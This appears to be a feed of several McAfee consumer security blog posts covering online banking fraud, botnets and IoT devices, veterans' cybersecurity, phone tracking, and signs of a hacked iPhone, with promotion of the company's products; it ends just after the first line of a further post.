Online banking is well on its way to becoming a cornerstone of the banking experience overall. More and more transactions occur over the internet rather than at a teller’s window, and nearly every account has a username, password, and PIN linked with it. And whether you use your online banking credentials often or not, hackers and scammers still want to get their hands on them. 

The fact is, online banking is growing and is here to stay. No longer a novelty, online banking is an expectation. Today, 78% of adults in the U.S. prefer to bank online. Meanwhile, only 29% prefer to bank in person. Further projections estimate that more than 3.6 billion people worldwide will bank online, driven in large part by online-only banks. 

There’s no doubt about it. We live in a world where banking, shopping, and payments revolve around a username and password. That’s quite a bit to take in, particularly if your first experiences with banking involved walking into a branch, getting a paper passbook, and maybe even a free toaster for opening an account. 

So, how do you protect yourself? Whether you use online banking regularly or sparingly, you can protect yourself from being the victim of fraud by following a few straightforward steps. 

Here’s how you can protect yourself from online banking fraud 

Use a strong password—and a password manager to keep them straight 

Start here. Passwords are your first line of defense. However, one thing that can be a headache is the number of passwords we have to juggle—a number that seems like it’s growing every day. Look around online and you’ll see multiple studies and articles stating that the average person has upwards of 80 to manage. Even if you have only a small percentage of those, strongly consider using a password manager. A good choice will generate strong, unique passwords for each of your accounts and store them securely for you. 

In general, avoid simple passwords that people can guess or easily glean from other sources (like your birthday, your child’s birthday, the name of your pet, and so on). Additionally, make them unique from account to account. That can save you major headaches if one account gets compromised and a hacker tries to use the same password on another account.  

If you want to set up your own passwords, check out this article on how you can make them strong and unique. 

Use two-factor authentication to protect your accounts 

What exactly is two-factor authentication? It’s an extra layer of defense for your accounts. In practice, it means that in addition to providing a password, you also receive a special one-time-use code to access your account. That code might be sent to you via email or to your phone by text. In some cases, you can also receive that code by a call to your phone. Basically, two-factor authentication combines two things: something you know, like your password; and something you have, like your smartphone. Together, that makes it tougher for scammers to hack into your accounts. 

Two-factor authentication is practically a standard, so much so that you already might be using it right now when you bank or use certain accounts. If not, you can see if your bank offers it as an option in your settings the next time you log in. Or, you can contact your bank for help to get it set up. 

Avoid phishing attacks: Look at your email inbox with a skeptical eye 

Phishing is a popular way for crooks to steal personal information by way of email, where a crook will look to phish (“fish”) personal and financial information out of you. No two phishing emails look alike. They can range from a request from a stranger posing as a lawyer who wants you to help with a bank transfer—to an announcement about (phony) lottery winnings. “Just send us your bank information and we’ll send your prize to you!” Those are a couple of classics. However, phishing emails have become much more sophisticated in recent years. Now, slicker hackers will pose as banks, online stores, and credit card companies, often using well-designed emails that look almost the same as the genuine article. 

Of course, those emails are fakes. The links they embed in those emails lead you to them, so they can steal your personal info or redirect a payment their way. One telltale sign of a phishing email is if the sender used an address that slightly alters the brand name or adds to it by tacking extra language at the end of it. If you get one of these emails, don’t click any of the links. Contact the institute in question using a phone number or address posted on their official website. This is a good guideline in general. The best avenue of communication is the one you’ve used and trusted before. 

Be skeptical about calls as well. Fraudsters use the phone too. 

It might seem a little traditional, yet criminals still like to use the phone. In fact, they rely on the fact that many still see the phone as a trusted line of communication. This is known as “vishing,” which is short for “voice phishing.” The aim is the same as it is with phishing. The fraudster is looking to lure you into a bogus financial transaction or attempting to steal information, whether that’s financial, personal, or both. They might call you directly, posing as your bank or even as tech support from a well-known company, or they might send you a text or email that directs you to call their number. 

For example, a crook might call and introduce themselves as being part of your bank or credit card company with a line like “there are questions about your account” or something similar. In these cases, politely hang up. Next, call your bank or credit card company to follow up on your own. If the initial call was legitimate, you’ll quickly find out and can handle the issue properly. If you get a call from a scammer, they can be very persuasive. Remember, though. You’re in charge. You can absolutely hang up and then follow up using a phone number you trust. 

Steer clear of financial transactions on public Wi-Fi in cafes, hotels, and libraries 

There’s a good reason not to use public Wi-Fi: it’s not private. They’re public networks, and that means they’re unsecure and shared by everyone who’s using it, which allows hackers to read any data passing along it like an open book. That includes your accounts and passwords if you’re doing any banking or shopping on it. The best advice here is to wait and handle those things at home if possible. (Or connect to public Wi-Fi with a VPN service, which we’ll cover below in a moment.)  

If not, you can always use your smartphone’s data connection to create a personal hotspot for your laptop, which will be far more secure. Another option is to use your smartphone alone. With a combination of your phone’s data connection and an app from your bank, you can take care of business that way instead of using public Wi-Fi. That said, be aware of your physical surroundings too. Make sure no one is looking over your shoulder! 

Protecting your banking and finances even further 

Some basic digital hygiene will go a long way toward protecting you even more—not only your banking and finances, but all the things you do online as well. The following quick list can help: 

• Update your software – That includes the operating system of your computers, smartphones, and tablets, along with the apps that are on them. Many updates include security upgrades and fixes that make it tougher for hackers to launch an attack.
• Lock up – Your computers, smartphones, and tablets will have a way of locking them with a PIN, a password, your fingerprint, or your face. Take advantage of that protection, which is particularly important if your device is lost or stolen.
  
•  Use security software – Protecting your devices with comprehensive online protection software will fend off the latest malware, spyware, and ransomware attacks, plus further protect your privacy and identity.
• Consider connecting with a VPN – also known as a “virtual private network,” a VPN helps you stay safer with bank-grade encryption and private browsing. It’s a particularly excellent option if you find yourself needing to use public Wi-Fi because a VPN effectively makes a public network private.
• Check your credit report and monitor your transactions – This is an important thing to do in today’s password- and digital-driven world. Doing so will uncover any inconsistencies or outright instances of fraud and put you on the path to setting them straight. Online protection software can help with this as well. It can keep an eye on your credit and your transactions all in one place, providing you with notifications if anything changes. That same monitoring can extend to retirement, investment, and loan accounts as well. Check out our plans and see which options work best for you.

The post How to Protect Yourself from Bank Fraud appeared first on McAfee Blog.

What is a botnet? And what does it have to do with a toaster?

We’ll get to that. First, a definition:

A botnet is a group of internet-connected devices that bad actors hijack with malware. Using remote controls, bad actors can harness the power of the network to perform several types of attacks. These include distributed denial-of-service (DDoS) attacks that shut down internet services, breaking into other networks to steal data, and sending massive volumes of spam.

In a way, the metaphor of an “army of devices” leveling a cyberattack works well. With thousands or even millions of compromised devices working in concert, bad actors can do plenty of harm. As we’ll see in a moment, they’ve done their share already.

Which brings us back to that toaster.

The pop-up toaster as we know it first hit the shelves in 1926, under the brand name “Toastmaster.”[i] With a familiar springy *pop*, it has ejected toast just the way we like it for nearly a century. Given that its design was so simple and effective, it’s remained largely unchanged. Until now. Thanks to the internet and so-called “smart home” devices.

Toasters, among other things, are all getting connected. And have been for a few years now, to the point where the number of connected Internet of Things (IoT) devices reaches well into the billions worldwide — which includes smart home devices.[ii]

Businesses use IoT devices to track shipments and various aspects of their supply chain. Cities use them to manage traffic flow and monitor energy use. (Does your home have a smart electric meter?) And for people like us, we use them to play music on smart speakers, see who’s at the front door with smart doorbells, and order groceries from an LCD screen on our smart refrigerators — just to name a few ways we’ve welcomed smart home devices into our households.

In the U.S. alone, smart home devices make up a $30-plus billion marketplace per year.[iii] However, it’s still a relatively young marketplace. And with that comes several security issues.

IoT security issues and big-time botnet attacks 

First and foremost, many of these devices still lack sophisticated security measures, which makes them easy pickings for cybercriminals. Why would a cybercriminal target that smart lightbulb in your living room reading lamp? Networks are only as secure as their least secure device. Thus, if a cybercriminal can compromise that smart lightbulb, it can potentially give them access to the entire home network it is on — along with all the other devices and data on it.

More commonly, though, hackers target smart home devices for another reason. They conscript them into botnets. It’s a highly automated affair. Hackers use bots to add devices to their networks. They scan the internet in search of vulnerable devices and use brute-force password attacks to take control of them.

At issue: many of these devices ship with factory usernames and passwords. Fed with that info, a hacker’s bot can have a relatively good success rate because people often leave the factory password unchanged. It’s an easy in.

Results from one real-life test show just how active these hacker bots are:

We created a fake smart home and set up a range of real consumer devices, from televisions to thermostats to smart security systems and even a smart kettle – and hooked it up to the internet.

What happened next was a deluge of attempts by cybercriminals and other unknown actors to break into our devices, at one stage, reaching 14 hacking attempts every single hour.

Put another way, that hourly rate added up to more than 12,000 unique scans and attack attempts a week.[iv] Imagine all that activity pinging your smart home devices.

Now, with a botnet in place, hackers can wage the kinds of attacks we mentioned above, particularly DDoS attacks. DDoS attacks can shut down websites, disrupt service and even choke traffic across broad swathes of the internet.

Remember the “Mirai” botnet attack of 2016, where hackers targeted a major provider of internet infrastructure?[v] It ended up crippling traffic in concentrated areas across the U.S., including the northeast, Great Lakes, south-central, and western regions. Millions of internet users were affected, people, businesses, and government workers alike.

Another more recent set of headline-makers are the December 2023 and July 2024 attacks on Amazon Web Services (AWS).[vi]^, [vii] AWS provides cloud computing services to millions of businesses and organizations, large and small. Those customers saw slowdowns and disruptions for three days, which in turn slowed down and disrupted the people and services that wanted to connect with them.

Also in July 2024, Microsoft likewise fell victim to a DDoS attack. It affected everything from Outlook email to Azure web services, and Microsoft Office to online games of Minecraft. They all got swept up in it.[viii]

These attacks stand out as high-profile DDoS attacks, yet smaller botnet attacks abound, ones that don’t make headlines. They can disrupt the operations of websites, public infrastructure, and businesses, not to mention the well-being of people who rely on the internet.

Botnet attacks: Security shortcomings in IoT and smart home devices 

Earlier we mentioned the problem of unchanged factory usernames and passwords. These include everything from “admin123” to the product’s name. Easy to remember, and highly insecure. The practice is so common that they get posted in bulk on hacking websites, making it easy for cybercriminals to simply look up the type of device they want to attack.

Complicating security yet further is the fact that some IoT and smart home device manufacturers introduce flaws in their design, protocols, and code that make them susceptible to attacks.[ix] The thought gets yet more unsettling when you consider that some of the flaws were found in things like smart door locks.

The ease with which IoT devices can be compromised is a big problem. The solution, however, starts with manufacturers that develop IoT devices with security in mind. Everything in these devices will need to be deployed with the ability to accept security updates and embed strong security solutions from the get-go.

Until industry standards get established to ensure such basic security, a portion of securing your IoT and smart home devices falls on us, as people and consumers.

Steps for a more secure network and smart devices 

As for security, you can take steps that can help keep you safer. Broadly speaking, they involve two things: protecting your devices and protecting the network they’re on. These security measures will look familiar, as they follow many of the same measures you can take to protect your computers, tablets, and phones.

Grab online protection for your smartphone. 

Many smart home devices use a smartphone as a sort of remote control, not to mention as a place for gathering, storing, and sharing data. So whether you’re an Android owner or iOS owner, use online protection software on your phone to help keep it safe from compromise and attack.

Don’t use the default — Set a strong, unique password. 

One issue with many IoT devices is that they often come with a default username and password. This could mean that your device and thousands of others just like it all share the same credentials, which makes it painfully easy for a hacker to gain access to them because those default usernames and passwords are often published online. When you purchase any IoT device, set a fresh password using a strong method of password creation, such as ours. Likewise, create an entirely new username for additional protection as well.

Use multi-factor authentication. 

Online banks, shops, and other services commonly offer multi-factor authentication to help protect your accounts — with the typical combination of your username, password, and a security code sent to another device you own (often a mobile phone). If your IoT device supports multi-factor authentication, consider using it there too. It throws a big barrier in the way of hackers who simply try and force their way into your device with a password/username combination.

Secure your internet router too. 

Another device that needs good password protection is your internet router. Make sure you use a strong and unique password as well to help prevent hackers from breaking into your home network. Also, consider changing the name of your home network so that it doesn’t personally identify you. Fun alternatives to using your name or address include everything from movie lines like “May the Wi-Fi be with you” to old sitcom references like “Central Perk.” Also check that your router is using an encryption method, like WPA2 or the newer WPA3, which keeps your signal secure.

Upgrade to a newer internet router. 

Older routers might have outdated security measures, which might make them more prone to attacks. If you’re renting yours from your internet provider, contact them for an upgrade. If you’re using your own, visit a reputable news or review site such as Consumer Reports for a list of the best routers that combine speed, capacity, and security.

Update your apps and devices regularly. 

In addition to fixing the odd bug or adding the occasional new feature, updates often fix security gaps. Out-of-date apps and devices might have flaws that hackers can exploit, so regular updating is a must from a security standpoint. If you can set your smart home apps and devices to receive automatic updates, that’s even better.

Set up a guest network specifically for your IoT devices. 

Just as you can offer your guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices on your primary network, the one where you connect your computers and smartphones.

Shop smart. 

Read trusted reviews and look up the manufacturer’s track record online. Have their devices been compromised in the past? Do they provide regular updates for their devices to ensure ongoing security? What kind of security features do they offer? And privacy features too? Resources like Consumer Reports can provide extensive and unbiased information that can help you make a sound purchasing decision.

Don’t let botnets burn your toast

As more and more connected devices make their way into our homes, the need to ensure that they’re secure only increases. More devices mean more potential avenues of attack, and your home network is only as secure as the least secure device that’s on it.

While standards put forward by industry groups such as UL and Matter have started to take root, a good portion of keeping IoT and smart home devices secure falls on us as consumers. Taking the steps above can help prevent your connected toaster from playing its part in a botnet army attack — and it can also protect your network and your home from getting hacked.

It’s no surprise that IoT and smart home devices have raked in billions of dollars over the years. They introduce conveniences and little touches into our homes that make life more comfortable and enjoyable. However, they’re still connected devices. And like anything that’s connected, they must be protected.

[i] https://www.hagley.org/librarynews/history-making-toast

[ii] https://www.statista.com/statistics/1183457/iot-connected-devices-worldwide/

[iii] https://www.statista.com/outlook/dmo/smart-home/united-states

[iv] https://www.which.co.uk/news/article/how-the-smart-home-could-be-at-risk-from-hackers-akeR18s9eBHU

[v] https://en.wikipedia.org/wiki/Mirai_(malware)

[vi] https://www.darkreading.com/cloud-security/eight-hour-ddos-attack-struck-aws-customers

[vii] https://www.forbes.com/sites/emilsayegh/2024/07/31/microsoft-and-aws-outages-a-wake-up-call-for-cloud-dependency/

[viii] https://www.bbc.com/news/articles/c903e793w74o

[ix] https://news.fit.edu/academics-research/apps-for-popular-smart-home-devices-contain-security-flaws-new-research-finds/

The post What Is a Botnet? appeared first on McAfee Blog.

As we honor Veterans Day, it’s crucial to recognize not only the sacrifices made by those who served but also the unique cybersecurity challenges they face in today’s digital age. Veterans, with their deep ties to sensitive military information and benefits, are increasingly being targeted by cybercriminals seeking to exploit their personal data. Seven in 10 military vets and active-duty service members have been a victim of at least one digital crime.

From phishing scams impersonating official VA communications to the risk of military identity theft, veterans encounter specific threats that require tailored cybersecurity awareness and precautions. By taking proactive steps, veterans can implement strong security practices to better protect their identities and enjoy a safer online experience.

Understanding the Risks

Veterans possess a wealth of sensitive information tied to their military service. This includes not only Social Security numbers, medical records, and details about deployments and benefits, but also personal histories that can include addresses, family information, and even details about combat experiences. Such comprehensive information is highly valuable to cybercriminals for various malicious activities, including identity theft and financial fraud.

Cybercriminals can exploit this data to impersonate veterans, gain unauthorized access to financial accounts, file false claims for VA benefits, or sell the information on the dark web. The repercussions of such breaches extend beyond financial loss, impacting veterans’ reputations, access to essential services, and overall peace of mind. Safeguarding this sensitive data is critical to ensuring veterans’ security and well-being in the digital age.

Common Threats Faced by Veterans

One of the primary threats that veterans encounter is phishing scams. These scams often impersonate official communications from the Department of Veterans Affairs (VA) or other military organizations. Cybercriminals use deceptive emails, text messages, or phone calls to trick veterans into revealing personal information or clicking malicious links that can compromise their devices.

Another prevalent danger is military identity theft, where criminals use stolen or fabricated military credentials to access benefits, obtain loans, or commit fraud in the veteran’s name. This type of identity theft can be particularly devastating, affecting not only financial stability but also the veteran’s reputation and access to crucial services.

Cybersecurity Awareness and Security Tips

In 2023, military consumers filed more than 93,000 fraud complaints, with imposter scams alone accounting for 42,766 cases, resulting in reported losses exceeding $178 million. To combat these threats, veterans must be equipped with robust cybersecurity awareness and practices:

1. Social Media Caution: Avoid sharing specific details about military service, deployments, or personal schedules on social media. Cybercriminals can use this information to impersonate you or guess security questions for account access. Adjust privacy settings on social media platforms to restrict who can view your posts and personal information. Social Privacy Manager can help you adjust more than 100 privacy settings across your social media accounts in just a few clicks.
2. Recognizing Phishing Attempts: Always verify the authenticity of emails or messages claiming to be from the VA or other military organizations before clicking on links or providing information. Official organizations typically do not request sensitive information via email or text.
3. Use Multi-Factor Authentication: Secure online accounts by enabling multi-factor authentication (MFA) whenever possible. MFA adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone or email, in addition to your password.
4. Embrace Password Complexity: Create passwords that are at least 12 characters long and include a mix of uppercase letters, lowercase letters, numbers, and special characters. Avoid using easily guessable information like birthdates or common words. Use a reputable password manager to generate and store complex passwords securely.
5. Regularly Monitoring Financial Accounts: Keep a close eye on bank statements, credit reports, and VA benefits statements for any unauthorized activity. Early detection can minimize the damage caused by identity theft. Setting up credit monitoring can also help you keep an eye out for unusual activity on your accounts.
6. Automatic Updates: Enable automatic updates for operating systems, software applications, and antivirus programs to ensure you have the latest security patches and protections against vulnerabilities.
7. Educating Family Members: Inform family members about the importance of cybersecurity practices, including recognizing phishing attempts and safeguarding personal information. Encourage family members to review and adjust privacy settings on their own social media accounts to limit exposure of personal information that could indirectly impact your security.
8. Consider Identity Theft Protection: For increased peace of mind, consider investing in a McAfee+ Family plan which protects up to 6 members with identity and privacy protection, including 24/7 monitoring of your personal info with alerts if something requires your attention and award-winning antivirus security for all your devices​​.

What to do if you may have been exposed

If you think you have been the victim of identity theft, immediately take steps to protect yourself and your family:

1. Place a Fraud Alert and Get Your Credit Reports: Contact a major credit bureau (Equifax, Experian, or TransUnion) to place a fraud alert on your credit report. This alert notifies creditors to take extra steps to verify your identity before opening new accounts in your name. Request and review your credit reports from all three bureaus to check for any unauthorized accounts or transactions.
2. Notify Your Commanding Officer: If you are an active-duty service member, inform your commanding officer immediately. This step is crucial to prevent unexpected calls or actions related to fraudulent debts or activities that could impact your military status or security clearance. Your commanding officer can provide guidance and support in handling the situation within military protocols.
3. File a Police Report: Contact your local law enforcement agency to file a report about the identity theft. Provide them with a copy of your Identity Theft Report from IdentityTheft.gov. A police report can support your claims of identity theft and may be required by creditors or financial institutions as part of the recovery process.
4. Monitor Your Accounts: Regularly monitor all financial accounts, including bank accounts, credit cards, and investment accounts, for any suspicious activity. Report any unauthorized transactions immediately to the respective financial institution.
5. Consider Placing a Credit Freeze: A credit freeze restricts access to your credit report, making it more difficult for identity thieves to open new accounts in your name. Contact each of the credit bureaus to request a credit freeze. You can temporarily lift or permanently remove the freeze when needed.
6. Report identity theft to the FTC: Visit identitytheft.gov, the Federal Trade Commission’s dedicated website for identity theft victims. Follow the step-by-step instructions to report the theft and provide as many details as possible about the fraudulent activity. IdentityTheft.gov will help you create an Identity Theft Report, which is essential for disputing fraudulent charges and repairing your credit.
7. Seek Support and Counseling: Identity theft can be a stressful and emotionally draining experience. Consider seeking support from military support services, such as Military OneSource, which offers resources and counseling to service members and their families facing financial challenges and identity theft.

As veterans continue to navigate the complexities of modern life, safeguarding their personal information online is paramount. By staying informed about cybersecurity best practices and leveraging available resources, veterans can significantly reduce their risk of falling victim to cyber threats.

The post Safeguarding Those Who Served: Cybersecurity Challenges for Veterans appeared first on McAfee Blog.

So, what does your phone know about you? Taken all together it knows plenty — sometimes in ways that feel like your phone is watching you.

It all comes down to the data that courses through your phone and your apps, along with a phone’s built-in tracking capabilities. Indeed, your phone certainly knows plenty about you. And companies keep tabs on that. Here’s how…

The apps on our phones entertain us, inform us, and help us shop. Many of them also track our activities and location — and then sell or share that info with third parties. From there, that info can end up with data brokers who sell that info to anyone who’ll pay. That includes advertisers, spammers, insurance companies, hackers, law enforcement, private investigators, and so on. It’s all legal, and it’s all part of a multi-billion-dollar industry worldwide.

Still, you can take charge of your privacy amidst all this data and info gathering. Several steps can reduce what your phone collects and shares with others.

For starters, though, let’s look at several of the things your phone knows about you.

It likely knows where you are and where you’ve been

Unless you’ve turned it off completely, your phone can track you in several ways with several degrees of accuracy:

GPS: The Global Positioning System, or GPS as many of us know it, is a system of satellites run by the U.S. government for navigation purposes. First designed for national defense, the system became available for public use in the 1980s. It’s highly accurate, to anywhere between nine to 30 feet depending on conditions and technology used, making it one of the strongest tools for determining a phone’s location. This is what powers location services on cell phones, and thus can help an app recommend a great burger joint nearby.

Cell towers: Cell phone providers can track a phone’s location by the distance it is to various cell phone towers and by the strength of its signal. The location info this method provides is a bit coarser than GPS, providing results that can place a phone within 150 feet. It’s most accurate in urban areas with high densities of cell phone towers, although it does not always work well indoors as some buildings can weaken or block cell phone signals.

One of the most significant public benefits of this method is that it automatically routes emergency service calls (like 911 in the U.S.) to the proper local authorities without any guesswork from the caller.

Public Wi-Fi: Larger tech companies and internet providers will sometimes provide free public Wi-Fi hotspots that people can tap into at airports, restaurants, coffeehouses, and such. It’s a nice convenience, but connecting to their Wi-Fi might share a phone’s MAC address, a unique identifier for connected devices, along with other identifiers on the smartphone.

Taken together, this can allow the Wi-Fi hosting company to gather location and behavioral data while you use your phone on their Wi-Fi network.

Bluetooth: Like with public Wi-Fi, companies can use strategically placed Bluetooth devices to gather location info as well. If Bluetooth is enabled on a phone, it will periodically seek out Bluetooth-enabled devices to connect to while the phone is awake. This way, a Bluetooth receiver can then capture that phone’s unique MAC address. This provides highly exact location info to within just a few feet because of Bluetooth’s short broadcast range.

In the past, we’ve seen retailers use this method to track customers in their physical stores to better understand their shopping habits. However, newer phones often create dummy MAC addresses when they seek out Bluetooth connections, which helps thwart this practice.

Now, here’s where all that tracking gets tricky

Certain apps pair location info with other info they collect while you use that app. In some cases, an app shares that precise combination of info with third parties. (It all depends on the terms in the user agreement you accepted once you installed it.)

What does that look like in the real world? Third parties might know:

• Where you live, based on when your phone is at rest during the evening.
• Where you work, by seeing where you commute to on a regular basis.
• Where your children go to school, by tracking your weekday pickup and drop-off routine.
• Your religion, by pinpointing the location of the place where you worship regularly.
• Where you had dinner and who you had it with, when you split the tab with a payment app.

Those are just a few examples of many.

Just to emphasize what we said above, not every app sells shares or sells your info to third parties. However, that gets into the complicated nature of user agreements. The language that covers what’s collected, for what reasons, what’s done with it, and who it’s shared can be tough to tease out because it’s often written in some form of legalese.

Broadly though, apps need to request permission to access location tracking services. In the past, we’ve seen some sketchy apps request location permissions even though they have no reason to. Examples include coupon apps, wallpaper apps, productivity apps, and plenty of games too. When apps like those ask for permission to access location tracking services, raises a red flag that your privacy is in jeopardy.

It might know about your health

Depending on what apps and services you use, your phone might know a lot about your health. That can include range of info, as apps can track things like step counts, vital signs, and menstrual cycles. Other apps manage health conditions or work as symptom checkers. In all, this data can get very private. Unfortunately, sometimes that data winds up in the hands of third parties.

With that, we’ve seen cases where people’s medical info was shared without their knowledge by medical apps and services.

In April 2024, The U.S. Federal Trade Commission (FTC) ruled against an online mental health service that “disclosed consumers’ sensitive personal health information and other sensitive data to third parties for advertising purposes…”[i] Also according to the complaint, the company gave third parties personal data about its users including names, medical and prescription histories, pharmacy and health insurance info, and other health info.

Also in April 2024, U.S. healthcare provider Kaiser Permanente disclosed that more than 13 million people had some of their personal data shared by third parties via tracking technologies on its websites and apps. Companies such as Microsoft (Bing), Google, and X (Twitter) were all named.[ii] That info possibly included how people interacted with and navigated through their website or mobile app, along with search terms used in Kaiser’s health encyclopedia.

It might know what you’ve told Siri or Google Assistant

So, is someone on the other end of your smartphone listening to your recordings when you use Siri or Google Assistant? Possibly, yes. Companies make constant improvements to their devices and services, which may include the review of commands from users to make sure they are interpreted correctly. There are typically two types of review — machine and human. As the names suggest, a machine review is a digital analysis. Human reviews entail someone listening to and evaluating a recorded command or reading and evaluating a transcript of a written command.

However, several manufacturers let you opt out of those reviews. In fact, you’ll find that they post a fair share of articles about this collection and review process, along with your choices for opting in or out as you wish:

• Apple explains its review process for Siri here, along with ways that you can opt out of these reviews. For more information about their overall privacy measures, visit Apple’s page here.
• As of April 2022, Google states that it does not retain your audio recordings by default—and you can browse or delete your Google Assistant history here.

Ways to limit tracking on your smartphone

Turn off your phone or switch to Airplane Mode. Disconnect. Without a Wi-Fi or data connection, you can’t get tracked. While this makes you unreachable, it also makes you untraceable, which you might want to consider if you’d rather keep your whereabouts and travels to yourself for periods of time.

Turn off location services altogether. As noted above, your smartphone can get tracked by other means, yet disabling location services in your phone settings shuts down a primary avenue of location data collection. Note that your maps apps won’t offer directions, and your restaurant app won’t point you toward that tasty burger when location services are off, but you’ll be more private than with them turned on.

Provide permissions on an app-by-app basis. Another option is to go into your phone settings and enable location services for specific apps in specific cases. For example, you can set your map app to enable location services only while in use. For other apps, you can disable location services entirely. Yet another option is to have the app ask for permissions each time. Note that this is a great way to discover if apps have defaulted to using location services without your knowledge when you installed them.

On an iPhone, you can find this in Settings -> Privacy & Security -> Location Services. On an Android, go to Settings -> Locations -> App Locations Permissions.

Turn off app tracking. As you’ve seen, some apps will ask to track your activity and potentially share it with data brokers and other third parties. You can halt this by turning off app tracking. On an iPhone, go to Settings -> Privacy & Security -> Tracking and disable “Allow Apps to Request to Track.” On an Android phone, go to Settings -> Privacy and Security, then turn on “Do Not Track.”

And just as you can with location services, you can set apps to make tracking requests on an app-by-app basis. You’ll see it on the same screen that has the global “Do Not Track” option.

Opt yourself out of cell phone carrier ad programs. Different cell phone carriers have different user agreements, yet some might allow the carrier to share insights about you with third parties based on browsing and usage history. Opting out of these programs might not stop your cell phone carrier from collecting data about you, but it might prevent it from sharing insights about you with others.

To see if you take part in one of these programs, log into your account portal or app. Look for settings around “relevant advertising,” “custom experience,” or even “advertising,” and then figure out if these programs are worth it.

Delete old apps. And be choosy about new ones. Fewer apps mean fewer avenues of potential data collection. If you have old, unused apps, consider deleting them, along with the accounts and data associated with them. Our Online Account Cleanup Online Account Cleanup can make quick work of it. It scans for accounts you no longer use, shows how risky they are, and helps you delete them, along with your personal info. In all, breaches and leaks are a numbers game. The fewer you keep, the better, when it comes to protecting your personal info.

Remove your info from data broker sites. As we’ve seen, the personal info on your smartphone can wind up on data broker sites. And they’ll sell it to practically anyone. Our Personal Data Cleanup can help you remove your personal info from several of the sketchiest brokers out there. Running it periodically can help keep your info off those sites if it crops up again.

[i] https://www.ftc.gov/news-events/news/press-releases/2024/04/proposed-ftc-order-will-prohibit-telehealth-firm-cerebral-using-or-disclosing-sensitive-data?utm_source=govdelivery

[ii] https://www.hipaajournal.com/kaiser-permanente-website-tracker-breach-affects-13-4-million-individuals/

The post Every Step You Take, Every Call You Make: Is Your Phone Tracking You? appeared first on McAfee Blog.

It takes a bit of effort, but iPhones can wind up with viruses and malware. And that can indeed lead to all kinds of snooping. 

Whether through malware or a bad app, hackers can skim personal info while you browse, bank, and shop. They can also infect your phone with ransomware that locks up your personal info or that locks up the phone itself. 

Those are some worst-case scenarios. However, good for you and unfortunate hackers is the way iPhones run apps. It makes it tough for viruses and malware to get a toehold. Apple designed the iOS operating system to run apps in what’s called a “virtual environment.” This limits the access apps have to other apps, which helps prevent viruses and malware from spreading. 

Still, malware can end up on an iPhone in a couple of ways: 

The owner “jailbreaks” the iPhone

This practice gives people more control over their iPhones. By jailbreaking, they gain “root control” of the phone. With that, they can do things like remove pre-installed apps and download third-party apps from places other than the App Store. And that’s where the trouble can start.  

Jailbreaking removes several of those barriers that keep viruses and malware from spreading. Further, downloading apps outside of the App Store exposes the phone to viruses and malware. Apple doesn’t review the apps in those stores. That way, a hacker with malicious intent can post a bad app with relative ease. 

A malicious app sneaks into the App Store

Apple has a strict review policy before apps are approved for posting in the App Store. Per Apple, “Apple’s App Review team of over 500 experts evaluates every single app submission — from developers around the world — before any app ever reaches users. On average, the team reviews approximately 132,500 apps a week.”

However, bad actors find ways to sneak malware into the store. Sometimes they upload an app that’s initially innocent and then push malware to users as part of an update. Other times, they’ll embed malicious code such that it only triggers after it’s run in certain countries. They will also encrypt malicious code in the app that they submit, which can make it difficult for reviewers to sniff out.   

So, barring a jailbroken phone, the chances of getting a virus or malware on your iPhone remain low. Still, it can happen.  

How to know if your smartphone has been hacked

Because we spend so much time on our phones, it’s fairly easy to tell when something isn’t working quite like it is supposed to. While you can chalk up some strange behavior to technical issues, sometimes those issues are symptoms of an infection. Malware can eat up system resources or conflict with other apps on your phone, causing it to act in odd ways.  

Some possible signs that your device has been hacked include:  

Performance issues  

A slower device, webpages taking way too long to load, or a battery that never keeps a charge are all things that can be attributed to a device reaching its retirement. However, these things might also be signs that malware has compromised your phone.  

Your phone feels like it’s running hot

Malware running in the background of a device might burn extra computing power, causing your phone to feel hot and overheated. If your device is quick to heat up, it might be due to malicious activity.  

Mysterious calls, texts, or apps appear

If apps you haven’t downloaded suddenly appear on your screen, or if outgoing calls you don’t remember making pop up on your phone bill, that is a definite red flag and a potential sign that your device has been hacked.  

Changes or pop-ups crowd your screen  

Malware might also be the cause of odd or frequent pop-ups, as well as changes made to your home screen. If you are getting an influx of spammy ads or your app organization is suddenly out of order, there is a big possibility that your phone has been hacked.  

Three tips to prevent your phone from being hacked

To avoid the hassle of having a hacked phone in the first place, here are some tips that can help.  

1. Update your phone and its apps.

Promptly updating your phone and apps is a primary way to keep your device safer. Updates often fix bugs and vulnerabilities that hackers rely on to download malware for their attacks.  

2. Avoid downloading from third-party app stores.

Apple’s App Store has those protections in place that we mentioned before. That’s unlike those third-party sites, which might not have those same protections. Further, some purposely host malicious apps. Avoiding these sites altogether can prevent these apps from allowing hackers into your device.  

3. Don’t use a jailbroken phone.

As we’ve seen, jailbreaking a phone introduces all kinds of security issues. Your best bet as an everyday internet user is to rely on iOS and the protections that come with it. 

Has my iPhone been hacked? 

If you are worried that your device has been hacked, follow these steps: 

Completely power down your phone. Powering down and then giving your phone a fresh start can put a halt to any malicious activity. 

Remove any apps you didn’t download. From there, power down your phone and restart it as before. 

If you still have issues, wiping and restoring your phone is an option. Provided you have your photos, contacts, and other vital info backed up in the cloud, it’s a relatively straightforward process. A quick search online can show how to wipe and restore your model of phone.  

Check your accounts and credit for any unauthorized purchases. Several features in our McAfee+ plans can help. Identity Monitoring can alert you if your info winds up on the dark web. Our Credit Monitoring along with our transaction monitoring can also alert you of unusual activity across your accounts. 

Lastly, if you spot an issue, get some help from a pro. Our Identity Theft Coverage & Restoration service offers $2 million that covers travel, losses, and legal fees associated with identity theft. It also offers the services of a licensed recovery pro who can repair your credit and your identity in the wake of an attack. 

The last word: Does my iPhone need antivirus? 

On a non-jailbroken phone, no. You don’t need antivirus. Yet your phone should certainly get extra protection. Phones face far more threats than viruses and malware alone. 

Comprehensive online protection software like ours can keep you and your phone safer. It can: 

• Block sketchy links in texts, emails, and messages. 

• Block yet more sketchy links in search, while surfing, and on social media. 

• Protect your identity in the ways mentioned above by keeping tabs on your credit and accounts. 

• Protect your privacy by removing your personal info from shady data broker sites. 

• Make you more private still by locking down your privacy settings on social media. 

Those are only a handful of the many features that protect more than your phone. You’ll find yet more that protect you — namely, your identity and your privacy. 

So while iPhones don’t need antivirus, they certainly benefit from extra online protection. 

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blog.

People under 60 are losing it online. And by it, I mean money—thanks to digital identity theft. 

